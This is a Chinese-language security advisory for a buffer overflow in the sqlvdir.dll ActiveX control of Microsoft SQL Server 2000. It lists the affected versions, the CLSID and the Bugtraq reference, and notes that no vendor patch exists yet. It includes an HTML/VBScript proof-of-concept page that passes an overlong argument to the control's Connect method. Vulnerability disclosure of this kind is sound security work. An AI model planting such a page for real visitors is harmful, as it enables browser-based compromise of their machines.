Microsoft SQL Server sqlvdir.dll ActiveX控制項緩衝區溢位漏洞

受影響系統：

Microsoft SQL Server 2000 SP4
Microsoft SQL Server 2000 SP3a
Microsoft SQL Server 2000 SP3
Microsoft SQL Server 2000 SP2
Microsoft SQL Server 2000 SP1
Microsoft SQL Server 2000

描述：

BUGTRAQ  ID: 31129

Microsoft SQL Server是一款流行的SQL資料庫系統。

SQL Server所安裝的sqlvdir.dll ActiveX控制項（預設路徑為C:\Program Files\Microsoft SQL Server\80\Tools\Binn\sqlvdir.dll，clsid：FC13BAA2-9C1A-4069-A221-31A147636038）所暴露的ISQLVDirControl介面沒有正確的驗證使用者輸入參數，如果使用者受騙訪問了惡意網頁並向該方式傳送了超長參數的話，就可能觸發緩衝區溢位，導致執行任意代碼。

<*來源：Beenu Arora （beenudel1986@gmail.com）
  
  連結：http://marc.info/?l=bugtraq&m=122115323714605&w=2
*>

測試方法：

警 告

以下程式(方法)可能帶有攻擊性，僅供安全研究與教學之用。使用者風險自負！

<html>
Test Exploit page
<object classid='clsid:FC13BAA2-9C1A-4069-A221-31A147636038' id='target' ></object>
<script language='vbscript'>
targetFile = "C:\Program Files\Microsoft SQL Server\80\Tools\Binn\sqlvdir.dll"
prototype  = "Sub Connect ( [ ByVal szServer As Variant ] ,  [ ByVal szWebSite As Variant ] )"  memberName = "Connect"
progid     = "SQLVDIRLib.SQLVDirControl"
argCount   = 2
arg1="defaultV"
arg2="http://test/test/test/te?s\test\test\tes\ttest\test\te@st\tes\test\test\tes.\ttest\test\test\tes\test\test\te.s\ttest\test\test\tes\test\test\tes\t\\\\\\\\\:#$%test\test\test\te?s\test\test\tes\\:$%\ttest\test\te@st\tes\test\test\tes.\ttest\test\test\tes\test\test\te.s\ttest\test\test\tes\test\test\tes\t\\\\\\\\\:$%test\test\test\te?s\test\test\tes\\:$%\ttest\test\te@st\tes\test\test\tes.\ttest\test\test\tes\test\test\te.s\ttest\test\test\tes\test\test\tes\t\\\\\\\\\:$%test\test\test\te?s\test\test\tes\\:$%\ttest\test\te@st\tes\test\test\tes.\ttest\test\test\tes\test\test\te.s\ttest\test\test\tes\test\test\tes\t\\\\\\\"  
target.Connect arg1 ,arg2

</script>

建議：

廠商補丁：

Microsoft
---------
目前廠商還沒有提供補丁或者升級程式，我們建議使用此軟體的使用者隨時關注廠商的首頁以擷取最新版本：

http://www.microsoft.com/technet/security/